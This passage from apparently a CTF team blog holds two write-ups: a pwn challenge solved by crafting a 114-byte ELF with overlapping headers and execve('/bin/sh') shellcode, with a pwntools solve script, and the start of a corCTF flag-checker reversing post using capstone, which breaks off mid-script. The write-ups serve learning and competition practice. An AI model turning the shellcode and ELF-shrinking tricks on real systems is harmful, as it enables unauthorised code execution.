        <span class="n">write</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="s">"Not an ELF file</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="mh">0x10</span><span class="p">);</span>
                        <span class="cm">/* WARNING: Subroutine does not return */</span>
        <span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
        <span class="p">}</span>
    <span class="p">}</span>
    <span class="n">iVar1</span> <span class="o">=</span> <span class="n">memfd_create</span><span class="p">(</span><span class="s">"program"</span><span class="p">,</span><span class="mi">0</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">iVar1</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">write</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="s">"Failed to create memfd</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="mh">0x17</span><span class="p">);</span>
                        <span class="cm">/* WARNING: Subroutine does not return */</span>
        <span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="n">write</span><span class="p">(</span><span class="n">iVar1</span><span class="p">,</span><span class="n">local_88</span><span class="p">,</span><span class="mh">0x78</span><span class="p">);</span>
    <span class="n">local_a0</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">;</span>
    <span class="n">local_98</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">;</span>
    <span class="n">iVar1</span> <span class="o">=</span> <span class="n">fexecve</span><span class="p">(</span><span class="n">iVar1</span><span class="p">,</span><span class="o">&amp;</span><span class="n">local_a0</span><span class="p">,</span><span class="o">&amp;</span><span class="n">local_98</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">iVar1</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">write</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="s">"Failed to execute</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="mh">0x12</span><span class="p">);</span>
                        <span class="cm">/* WARNING: Subroutine does not return */</span>
        <span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">local_10</span> <span class="o">!=</span> <span class="o">*</span><span class="p">(</span><span class="kt">long</span> <span class="o">*</span><span class="p">)(</span><span class="n">in_FS_OFFSET</span> <span class="o">+</span> <span class="mh">0x28</span><span class="p">))</span> <span class="p">{</span>
                        <span class="cm">/* WARNING: Subroutine does not return */</span>
        <span class="n">__stack_chk_fail</span><span class="p">();</span>
    <span class="p">}</span>
    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Looks fairly straightforward – essentially, it takes up to 120 bytes of input (as an ELF file) that starts with <code class="language-plaintext highlighter-rouge">7f 45 4c 46 02 01 01 00</code> (with some dynamic debugging on the <code class="language-plaintext highlighter-rouge">for</code> loop), write the input into an anonymous file created by <code class="language-plaintext highlighter-rouge">memfd_create</code>, and executes that file. If the file does something like <code class="language-plaintext highlighter-rouge">execve("/bin/sh", -, -)</code>, we get a shell. Simple.</p>

<h3 id="first-attempt-compiling-c">First Attempt: compiling C</h3>

<p>Since we need an 64ELF (for the header constraint), as the first attempt, I tried to compile bare assembly within a c program:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span>
    <span class="n">__asm__</span> <span class="p">(</span>
        <span class="s">"movq $0x0068732f6e69622f, %%rbx</span><span class="se">\n\t</span><span class="s">"</span> <span class="c1">// '/bin/sh\x00'</span>
        <span class="s">"push %%rbx</span><span class="se">\n\t</span><span class="s">"</span>
        <span class="s">"movq %%rsp, %%rdi</span><span class="se">\n\t</span><span class="s">"</span> <span class="c1">// rdi points to '/bin/sh', rsi and rdx don't really matter for /bin/sh</span>
        <span class="s">"movl $0x3b, %%eax</span><span class="se">\n\t</span><span class="s">"</span> <span class="c1">// rax = 0x3b for execve</span>
        <span class="s">"syscall</span><span class="se">\n\t</span><span class="s">"</span>
        <span class="o">:</span>
        <span class="o">:</span>
        <span class="o">:</span> <span class="s">"rdi"</span><span class="p">,</span> <span class="s">"rbx"</span><span class="p">,</span> <span class="s">"eax"</span>
    <span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>However, the ELF is 15KB (more than 100x the size of the acceptable input). Even with some optimization, the size of the resulting ELF’s size is not even close to 120 bytes. So this is definitely not the way – the problem with compiling a C program to an ELF is that the compiler includes too many unneccessary parts such as <code class="language-plaintext highlighter-rouge">.plt</code>, <code class="language-plaintext highlighter-rouge">.init</code>, <code class="language-plaintext highlighter-rouge">.bss</code>. We don’t need any of those – just need it to jump to the shellcode and execute it. This begs the question – what is the bare minimum for an 64ELF?</p>

<h3 id="the-smallest-elfs">The smallest ELFs?</h3>
<p>This <a href="https://github.com/tmpout/elfs">github repo</a> shows some interesting ELFs. <code class="language-plaintext highlighter-rouge">golfed.polymorphic.execve.x86</code> is 76 bytes that gets a shell but the first eight bytes does not match the restriction of this challenge. <code class="language-plaintext highlighter-rouge">base.bin</code> is a 64ELF that starts with <code class="language-plaintext highlighter-rouge">7f 45 4c 46 02 01 01 00</code> and is 128 bytes. In particular, it contains only the ELF header, the Program header, and three x86 instructions. So persumably, only the ELF header and the program header are the bare minimum for a valid ELF. The problem is that the two headers together are already 120 bytes! So, without some tricks, we won’t be able to do anything. Before diving into those tricks, let’s take a look at the semantics of those headers.</p>

<h3 id="a-little-detour-to-the-64elf-header-and-program-header-ph-table">A little detour to the 64ELF header and Program Header (Ph) table</h3>

<p>The 64ELF header has a fixed size of 0x3e bytes:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">typedef</span> <span class="k">struct</span>
<span class="p">{</span>
  <span class="kt">unsigned</span> <span class="kt">char</span>	<span class="n">e_ident</span><span class="p">[</span><span class="n">EI_NIDENT</span><span class="p">];</span>	<span class="cm">/* Magic number and other info */</span>
  <span class="n">Elf64_Half</span>	<span class="n">e_type</span><span class="p">;</span>			<span class="cm">/* Object file type */</span>
  <span class="n">Elf64_Half</span>	<span class="n">e_machine</span><span class="p">;</span>		<span class="cm">/* Architecture */</span>
  <span class="n">Elf64_Word</span>	<span class="n">e_version</span><span class="p">;</span>		<span class="cm">/* Object file version */</span>
  <span class="n">Elf64_Addr</span>	<span class="n">e_entry</span><span class="p">;</span>		<span class="cm">/* Entry point virtual address */</span>
  <span class="n">Elf64_Off</span>	    <span class="n">e_phoff</span><span class="p">;</span>		<span class="cm">/* Program header table file offset */</span>
  <span class="n">Elf64_Off</span>	    <span class="n">e_shoff</span><span class="p">;</span>		<span class="cm">/* Section header table file offset */</span>
  <span class="n">Elf64_Word</span>	<span class="n">e_flags</span><span class="p">;</span>		<span class="cm">/* Processor-specific flags */</span>
  <span class="n">Elf64_Half</span>	<span class="n">e_ehsize</span><span class="p">;</span>		<span class="cm">/* ELF header size in bytes */</span>
  <span class="n">Elf64_Half</span>	<span class="n">e_phentsize</span><span class="p">;</span>	<span class="cm">/* Program header table entry size */</span>
  <span class="n">Elf64_Half</span>	<span class="n">e_phnum</span><span class="p">;</span>		<span class="cm">/* Program header table entry count */</span>
  <span class="n">Elf64_Half</span>	<span class="n">e_shentsize</span><span class="p">;</span>	<span class="cm">/* Section header table entry size */</span>
  <span class="n">Elf64_Half</span>	<span class="n">e_shnum</span><span class="p">;</span>		<span class="cm">/* Section header table entry count */</span>
  <span class="n">Elf64_Half</span>	<span class="n">e_shstrndx</span><span class="p">;</span>		<span class="cm">/* Section header string table index */</span>
<span class="p">}</span> <span class="n">Elf64_Ehdr</span><span class="p">;</span>
</code></pre></div></div>

<p>The first 0x10 bytes of an ELF file is its identifier – an ELF file always starts with the four magic bytes <code class="language-plaintext highlighter-rouge">7f 45 4c 46</code>. The next 5 bytes indicate its fundamental properties such as endianness and the type of th ELF header (32ELF vs 64ELF). Followed by 7 bytes of padding (for future extension, <strong>foreshadowing</strong>). The rest of the ELF header fields are shown in the comments. Since the ELF header size is fixed, I tried to patch out the program header by setting <code class="language-plaintext highlighter-rouge">e_phnum = 0</code>. However, that resulted in</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash: ./base.bin: cannot execute binary file: Exec format error
</code></pre></div></div>

<p>Therefore, my conclusion is that there must be a program header for an ELF. So, I tried to strink the size of the program header. In <code class="language-plaintext highlighter-rouge">base.bin</code>, <code class="language-plaintext highlighter-rouge">e_phentsize = 0x38</code>. I tried to change that value, but it also resulted in the above error. So, let’s take a look at the program header struct:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">typedef</span> <span class="k">struct</span>
<span class="p">{</span>
  <span class="n">Elf64_Word</span>	<span class="n">p_type</span><span class="p">;</span>			<span class="cm">/* Segment type */</span>
  <span class="n">Elf64_Word</span>	<span class="n">p_flags</span><span class="p">;</span>		<span class="cm">/* Segment flags */</span>
  <span class="n">Elf64_Off</span>	    <span class="n">p_offset</span><span class="p">;</span>		<span class="cm">/* Segment file offset */</span>
  <span class="n">Elf64_Addr</span>	<span class="n">p_vaddr</span><span class="p">;</span>		<span class="cm">/* Segment virtual address */</span>
  <span class="n">Elf64_Addr</span>	<span class="n">p_paddr</span><span class="p">;</span>		<span class="cm">/* Segment physical address */</span>
  <span class="n">Elf64_Xword</span>	<span class="n">p_filesz</span><span class="p">;</span>		<span class="cm">/* Segment size in file */</span>
  <span class="n">Elf64_Xword</span>	<span class="n">p_memsz</span><span class="p">;</span>		<span class="cm">/* Segment size in memory */</span>
  <span class="n">Elf64_Xword</span>	<span class="n">p_align</span><span class="p">;</span>		<span class="cm">/* Segment alignment */</span>
<span class="p">}</span> <span class="n">Elf64_Phdr</span><span class="p">;</span>
</code></pre></div></div>

<p>So, persumably, the program header has a fixed size.</p>

<h3 id="trick-1-header-overlay">Trick 1: Header overlay</h3>

<p>As detailed <a href="https://www.muppetlabs.com/~breadbox/software/tiny/teensy.html">here</a>, if the end of the ELF header matches with the start of the program header, we can <em>shift</em> the start of the program header by changing the value of <code class="language-plaintext highlighter-rouge">e_phoff</code> (the offset of the program header from the start of the binary). Decompiling <code class="language-plaintext highlighter-rouge">base.bin</code> with Ghidra, we see:</p>

<p><img src="/assets/images/tfcctf/headers.png" alt="headers" /></p>

<p>Hmmm, doesn’t match exactly. But the 0x38<em>th</em> (in this post, all indices are 0-indexed unless otherwise specified) byte (the number of program headers) is 0x01 which matches with the first byte of the program header. To make them match, I patched the 0x3c<em>th</em> bytes to be 0x05. That doesn’t cause any issues – the reason being <code class="language-plaintext highlighter-rouge">e_shoff = 0</code>, indicating there is no section header. Great, so the <em>effective</em> size of the program header is reduced by 8 bytes (the size of the overlay)!</p>

<h3 id="the-shortest-x86-shellcode">The shortest x86 shellcode?</h3>

<p>So, the effective total size of the headers is reduced to 112 bytes. But we still need to place the actual shellcode into the ELF. Translating the above C code into x86:</p>

<pre><code class="language-asm">mov rbx, 0x68732f6e69622f2f
push rbx 
mov rdi, rsp 
mov eax, 0x3b
syscall
</code></pre>

<p>This gives a shell and is only 21 bytes which is fairly short but we can make it even shorter by replacing the second and third <code class="language-plaintext highlighter-rouge">mov</code> with <code class="language-plaintext highlighter-rouge">push + pop</code>:</p>

<pre><code class="language-asm">mov rbx, 0x0068732f6e69622f
push rbx
push rsp
pop rdi
push 0x3b
pop rax
syscall
</code></pre>

<p>Compile it and we get 18 bytes! (Please let me know if you can craft an even shorter x86 shellcode.) So with header overlay, we have a total of 130 bytes. Still need to reduce it by at least 10 bytes!</p>

<p>(Side note: While writing this writeup, I realized that it might have been easier if I changed <code class="language-plaintext highlighter-rouge">e_machine</code> to be <code class="language-plaintext highlighter-rouge">i386</code> so that the program header is smaller. )</p>

<h3 id="trick-2-program-header-and-text-overlay">Trick 2: Program header and <code class="language-plaintext highlighter-rouge">.text</code> overlay</h3>

<p>Similar to the first trick, why don’t we try to overlay the program header and the <code class="language-plaintext highlighter-rouge">.text</code> section? After all, they are just bytes! This works up to 8 bytes – I removed the last 8 bytes from the program header and directly appended the shellcode right after (+ adjusting <code class="language-plaintext highlighter-rouge">e_entry</code>). Apparently, neither the file parser nor the virtual address space care about the segment alignment. If we go beyond 8 bytes – we are <em>overwriting</em> the <code class="language-plaintext highlighter-rouge">p_memsz</code> and that causes an error because there is simply not that much memory (as we will be writing the most significant byte of the <code class="language-plaintext highlighter-rouge">p_memsz</code>)!</p>

<p>122 bytes! 2 more to go!</p>

<h3 id="trick-3-store-data-within-the-elf-header">Trick 3: Store data within the ELF header</h3>

<p>At first, it seems a bit hopeless – to my knowledge, the x86 shellcode is optimized as much as possible and the effective headers size cannot be reduced. However, I recall from <a href="https://www.muppetlabs.com/~breadbox/software/tiny/teensy.html">here</a> that instructions can be placed inside the ELF header padding. Unfortunately, I couldn’t make that work with header overlay (it works without header overlay). But, in a similar way, I thought we can actually place the <code class="language-plaintext highlighter-rouge">'/bin/sh'</code> string there as well. And that worked by overwriting the 8<em>th</em> bytes and the padding (8 bytes of data in total)! The final shellcode looks like:</p>

<pre><code class="language-asm">; in ./sc.asm
mov rdi, 0x0400008 ; where /bin/sh is 
push 0x3b
pop rax
syscall
</code></pre>

<p>This works because PIE is not enabled (for more about PIE, see <a href="https://codywu2010.wordpress.com/2014/11/29/about-elf-pie-pic-and-else/">here</a>).</p>

<p>114 bytes and flag! Ayyy!</p>

<h3 id="solve-script">Solve script</h3>

<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span>
<span class="n">context</span><span class="p">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s">'debug'</span>
<span class="c1"># io = remote('challs.tfcctf.com', 32501)
</span><span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s">'./santas_little_helper'</span><span class="p">)</span>

<span class="n">bs</span> <span class="o">=</span> <span class="nb">bytearray</span><span class="p">()</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s">'./base.bin'</span><span class="p">,</span> <span class="s">'rb'</span><span class="p">)</span> <span class="k">as</span> <span class="n">header</span><span class="p">:</span> 
    <span class="n">arr</span> <span class="o">=</span> <span class="n">header</span><span class="p">.</span><span class="n">read</span><span class="p">()</span>
    <span class="n">tmp</span> <span class="o">=</span> <span class="nb">bytearray</span><span class="p">(</span><span class="n">arr</span><span class="p">[:</span><span class="mh">0x40</span><span class="p">])</span>
    <span class="n">tmp</span> <span class="o">+=</span> <span class="n">arr</span><span class="p">[</span><span class="mh">0x48</span><span class="p">:</span><span class="mh">0x78</span><span class="o">-</span><span class="mh">0x8</span><span class="p">]</span> <span class="c1"># trick 1 + trick 2: don't need the beginning and the end of the Ph (program header) for the overlays
</span>    <span class="n">tmp</span><span class="p">[</span><span class="mh">0x18</span><span class="p">]</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">tmp</span><span class="p">)</span> <span class="c1"># trick 2: change e_entry so that it's immediately after the Ph
</span>    <span class="n">tmp</span><span class="p">[</span><span class="mh">0x20</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x38</span> <span class="c1"># trick 1: shifting the start of Ph by changing e_phoff 
</span>    <span class="n">tmp</span><span class="p">[</span><span class="mh">0x3c</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x5</span> <span class="c1"># trick 1: change the end of the ELF header so that the overlay works
</span>    <span class="n">bs</span> <span class="o">+=</span> <span class="n">tmp</span>

<span class="c1"># from `nasm -f bin -o sc sc.asm`
</span><span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s">'./sc'</span><span class="p">,</span> <span class="s">'rb'</span><span class="p">)</span> <span class="k">as</span> <span class="n">sc</span><span class="p">:</span> <span class="c1"># append the shellcode from above
</span>    <span class="n">arr</span> <span class="o">=</span> <span class="n">sc</span><span class="p">.</span><span class="n">read</span><span class="p">()</span>
    <span class="n">bs</span> <span class="o">+=</span> <span class="n">arr</span> 
    <span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">b</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">p64</span><span class="p">(</span><span class="mh">0x0068732f6e69622f</span><span class="p">)):</span> <span class="c1"># trick 3
</span>        <span class="n">bs</span><span class="p">[</span><span class="mh">0x8</span> <span class="o">+</span> <span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">b</span>

<span class="n">io</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="nb">bytes</span><span class="p">(</span><span class="n">bs</span><span class="p">))</span>

<span class="n">io</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span>
</code></pre></div></div>]]></content><author><name>notbean</name></author><summary type="html"><![CDATA[Ayyy misc pwn.]]></summary></entry><entry><title type="html">[corCTF 2024] digest-me</title><link href="https://maplebacon.org/2024/07/corctf-digest-me/" rel="alternate" type="text/html" title="[corCTF 2024] digest-me" /><published>2024-07-29T00:00:00+00:00</published><updated>2024-07-29T00:00:00+00:00</updated><id>https://maplebacon.org/2024/07/corctf-digest-me</id><content type="html" xml:base="https://maplebacon.org/2024/07/corctf-digest-me/"><![CDATA[<p>Having no solves yet in the rev category with one day remaining in corCTF 2024, I decided to have a
gander at something that looked approachable. The two easiest challenges at the time by solve count
were <em>corMine: The Beginning</em> and its sequel <em>corMine 2: Revelations</em>, which was a game of some sort.
However, I eventually gave up after 5+ minutes trying to get the game to just <strong>run</strong>! But I guess I
don’t feel so bad seeing as my teammates couldn’t figure it out either :’)</p>

<figure class="image">
    <img src="/assets/images/corctf2024/wtf.png" />
    <figcaption>corMine refusing to run without a GPU smh</figcaption>
</figure>

<p>The next easiest one on the list was called <em>digest-me</em>, which is the topic of this post and what
I poured most of my time on for the next 24 hours. Luckily, this one was a simple binary that asked
you to input a flag, and told you whether it was correct. These kinds of programs are common enough
in CTFs that they adopt a not-so-special name called a <em>flag checker</em>.</p>

<h3 id="challenge">Challenge</h3>

<p>The description gives us a few clues, perhaps it has something to do with <strong>hashing</strong> and <strong>bits</strong>
(?), but otherwise just contains the average lore.</p>

<blockquote>
  <p>FizzBuzz101 was innocently writing a new, top-secret compiler when his computer was Crowdstriked.
Worse, the recovery key is behind a hasher that he wrote and compiled himself, and he can’t
remember how the bits work! Can you help him get his life’s work back?</p>
</blockquote>

<p>Here is a sample interaction from the <code class="language-plaintext highlighter-rouge">digestme</code> binary:</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>./digestme
Welcome!
Please enter the flag here:
corctf<span class="o">{</span>what<span class="o">}</span>
Try again:
corctf<span class="o">{</span>potatoes<span class="o">}</span>
Try again:
</code></pre></div></div>

<h3 id="its-too-big">It’s too big</h3>

<p>One problem immediately came up when opening the program in Ghidra – it refused to decompile
<code class="language-plaintext highlighter-rouge">main()</code>! Examining the disassembly to see what could possibly have went wrong, I was horrified to
witness a chain of about 300,000 instructions consisting solely of <code class="language-plaintext highlighter-rouge">mov</code>, <code class="language-plaintext highlighter-rouge">and</code>, <code class="language-plaintext highlighter-rouge">or</code> and <code class="language-plaintext highlighter-rouge">xor</code>:</p>

<p><img src="/assets/images/corctf2024/mov.png" alt="mov.png" /></p>

<p>Luckily, I worked around this by patching <code class="language-plaintext highlighter-rouge">ret</code> instructions near the top and bottom of <code class="language-plaintext highlighter-rouge">main()</code> to
ensure Ghidra doesn’t try to decompile all of it. That allows us to finally see the start of the
function.</p>

<p><img src="/assets/images/corctf2024/decomp1.png" alt="decomp1.png" /></p>

<h3 id="brute-force">Brute force?</h3>

<p>Through a combination of static and dynamic analysis, I was able to constrain the flag to a set of
preconditions that were enforced by those <code class="language-plaintext highlighter-rouge">if</code>s:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>len(flag) == 19
flag[:7] == "corctf{"
flag[8] == flag[17]
flag[9] == flag[11]
flag[7] == flag[16] + 1
flag[14] == flag[16] + 4
</code></pre></div></div>

<p>The short flag certainly raised my eyebrows about the possibility of brute force. There were 11
unknown bytes but 4 of those can be disregarded because of the extra constraints, for a total of
<code class="language-plaintext highlighter-rouge">95^7 = 69,833,729,609,375</code> possible flags (assuming the flag is printable).</p>

<p>However, it’s worth noting that each run would require <em>at least</em> 300,000 instructions, and 2 days
would not nearly be enough to find the flag in time on my poor <code class="language-plaintext highlighter-rouge">4-core Intel-i5</code> laptop.</p>

<p><img src="/assets/images/corctf2024/decomp2.png" alt="decomp2.png" /></p>

<p>The rest of the program is focused on executing the said 300,000 instructions, which judging by the
disassembly just seems to be a bunch of operations on an array. <code class="language-plaintext highlighter-rouge">A</code> is initialized at the start via
<code class="language-plaintext highlighter-rouge">A = (byte *)calloc(1,100000)</code>, which allocates a zero-filled 100,000-byte array.</p>

<p>The flag is then loaded into <code class="language-plaintext highlighter-rouge">A</code> by converting each byte inside <code class="language-plaintext highlighter-rouge">corctf{...}</code> into 8 bits, and then
loading the bits starting from the offset <code class="language-plaintext highlighter-rouge">*(A+0x940)</code> in big-endian order. For those who speak
Python, that looks something like this:</p>

<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">A</span><span class="p">[</span><span class="mh">0x940</span><span class="p">:</span><span class="mh">0x998</span><span class="p">]</span> <span class="o">=</span> <span class="p">[(</span><span class="n">c</span> <span class="o">&gt;&gt;</span> <span class="n">i</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mi">1</span> <span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">code</span><span class="p">[</span><span class="mi">7</span><span class="p">:</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">7</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">)]</span>
</code></pre></div></div>

<p>After the extremely long chain of array operations, the first 128 bits of <code class="language-plaintext highlighter-rouge">A</code> are converted into
4 32-bit integers (call them <code class="language-plaintext highlighter-rouge">a, b, c, d</code>). The flag checker outputs <code class="language-plaintext highlighter-rouge">Nice!</code> if
<code class="language-plaintext highlighter-rouge">c == 0x19c603b</code> and <code class="language-plaintext highlighter-rouge">d == 0x14353ce</code> (A.K.A. the target condition).</p>

<h3 id="reversing-the-elephant-in-the-room">Reversing the elephant in the room</h3>

<p>Now that it was clear how the program was checking the flag, I worked on parsing the long array
operations into something more readable. Once we had the instructions in a higher-level language, it
would be possible in theory to rely on z3 to recover the flag for us.</p>

<p>Instead of bashing Ghidra to decompile everything for us, I used <code class="language-plaintext highlighter-rouge">capstone</code> to parse the machine
code into a clean disassembly:</p>

<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">capstone</span> <span class="kn">import</span> <span class="o">*</span>

<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s">'digestme'</span><span class="p">,</span> <span class="s">'rb'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
    <span class="n">binary</span> <span class="o">=</span> <span class="n">f</span><span class="p">.</span><span class="n">read</span><span class="p">()</span>

<span class="n">code</span> <span class="o">=</span> <span class="n">binary</span><span class="p">[</span><span class="mh">0x1290</span><span class="p">:</span><span class="mh">0xed854</span><span class="p">]</span>

<span class="n">cs</span> <span class="o">=</span> <span class="n">Cs</span><span class="p">(</span><span class="n">CS_ARCH_X86</span><span class="p">,</span> <span class="n">CS_MODE_64</span><span class="p">)</span>
<span class="n">instructions</span> <span class="o">=</span> <span class="n">cs</span><span class="p">.</span><span class="n">disasm</span><span class="p">(</span><span class="n">code</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span>

<span class="k">for</span> <span class="n">inst</span> <span class="ow">in</span> <span class="n">instructions</span><span class="p">:</span>
    <span class="k">print</span><span class="p">(</span><span class="n">inst</span><span class="p">.</span><span class="n">mnemonic</span><span class="p">,</span> <span class="n">inst</span><span class="p">.</span><span class="n">op_str</span><span class="p">)</span>
</code></pre></div></div>

<p>After combing through the output, I was surprised to find only two distinct groups of instructions.
It was either a simple <code class="language-plaintext highlighter-rouge">mov</code> in the form,</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mov byte ptr [rax + X], Y
</code></pre></div></div>

<p>which maps to <code class="language-plaintext highlighter-rouge">A[X] = Y</code>, or</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mov cl, byte ptr [rax + X]
&lt;op&gt; cl, byte ptr [rax + Y]
mov byte ptr [rax + Z], cl
</code></pre></div></div>

<p>which maps to <code class="language-plaintext highlighter-rouge">A[Z] = A[X] &lt;op&gt; A[Y]</code> where <code class="language-plaintext highlighter-rouge">&lt;op&gt; ∈ [and, or, xor]</code>.</p>

<p>This made it relatively easy to decompile with a little bit of regex:</p>

<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">capstone</span> <span class="kn">import</span> <span class="o">*</span>
<span class="kn">import</span> <span class="nn">re</span>

<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s">'digestme'</span><span class="p">,</span> <span class="s">'rb'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
    <span class="n">binary</span> <span class="o">=</span> <span class="n">f</span><span class="p">.</span><span class="n">read</span><span class="p">()</span>

<span class="n">OP_MAP</span> <span class="o">=</span> <span class="p">{</span><span class="s">'and'</span><span class="p">:</span> <span class="s">'&amp;'</span><span class="p">,</span> <span class="s">'or'</span><span class="p">:</span> <span class="s">'|'</span><span class="p">,</span> <span class="s">'xor'</span><span class="p">:</span> <span class="s">'^'</span><span class="p">}</span>

<span class="n">code</span> <span class="o">=</span> <span class="n">binary</span><span class="p">[</span><span class="mh">0x1290</span><span class="p">:</span><span class="mh">0xed854</span><span class="p">]</span>

<span class="n">cs</span> <span class="o">=</span> <span class="n">Cs</span><span class="p">(</span><span class="n">CS_ARCH_X86</span><span class="p">,</span> <span class="n">CS_MODE_64</span><span class="p">)</span>
<span class="n">instructions</span> <span class="o">=</span> <span class="n">cs</span><span class="p">.</span><span class="n">disasm</span><span class="p">(</span><span class="n">code</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span>

<span class="n">commands</span> <span class="o">=</span> <span class="p">[]</span>

<span class="k">while</span> <span class="p">(</span><span class="n">inst</span> <span class="p">:</span><span class="o">=</span> <span class="nb">next</span><span class="p">(</span><span class="n">instructions</span><span class="p">,</span> <span class="bp">None</span><span class="p">))</span> <span class="ow">is</span> <span class="ow">not</span> <span class="bp">None</span><span class="p">:</span>
    <span class="k">assert</span> <span class="n">inst</span><span class="p">.</span><span class="n">mnemonic</span> <span class="o">==</span> <span class="s">'mov'</span>

    <span class="k">if</span> <span class="n">m</span> <span class="p">:</span><span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">fullmatch</span><span class="p">(</span><span class="sa">r</span><span class="s">'byte ptr \[rax( \+ (\w+)|)\], ([01])'</span><span class="p">,</span> <span class="n">inst</span><span class="p">.</span><span class="n">op_str</span><span class="p">):</span>
        <span class="n">out</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">m</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="mi">0</span><span class="p">)</span> <span class="k">if</span> <span class="n">m</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="k">else</span> <span class="mi">0</span>
        <span class="n">val</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">m</span><span class="p">[</span><span class="mi">3</span><span class="p">])</span>
        <span class="n">commands</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="sa">f</span><span class="s">'A[</span><span class="si">{</span><span class="n">out</span><span class="si">:</span><span class="c1">#x</span><span class="si">}</span><span class="s">] = </span><span class="si">{</span><span class="n">val</span><span class="si">}</span><span class="s">'</span><span class="p">)</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="n">m</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">fullmatch</span><span class="p">(</span><span class="sa">r</span><span class="s">'cl, byte ptr \[rax( \+ (\w+)|)\]'</span><span class="p">,</span> <span class="n">inst</span><span class="p">.</span><span class="n">op_str</span><span class="p">)</span>
        <span class="n">in1</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">m</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="mi">0</span><span class="p">)</span> <span class="k">if</span> <span class="n">m</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="k">else</span> <span class="mi">0</span>

        <span class="n">inst</span> <span class="o">=</span> <span class="nb">next</span><span class="p">(</span><span class="n">instructions</span><span class="p">)</span>
        <span class="n">m</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">fullmatch</span><span class="p">(</span><span class="sa">r</span><span class="s">'cl, byte ptr \[rax( \+ (\w+)|)\]'</span><span class="p">,</span> <span class="n">inst</span><span class="p">.</span><span class="n">op_str</span><span class="p">)</span>
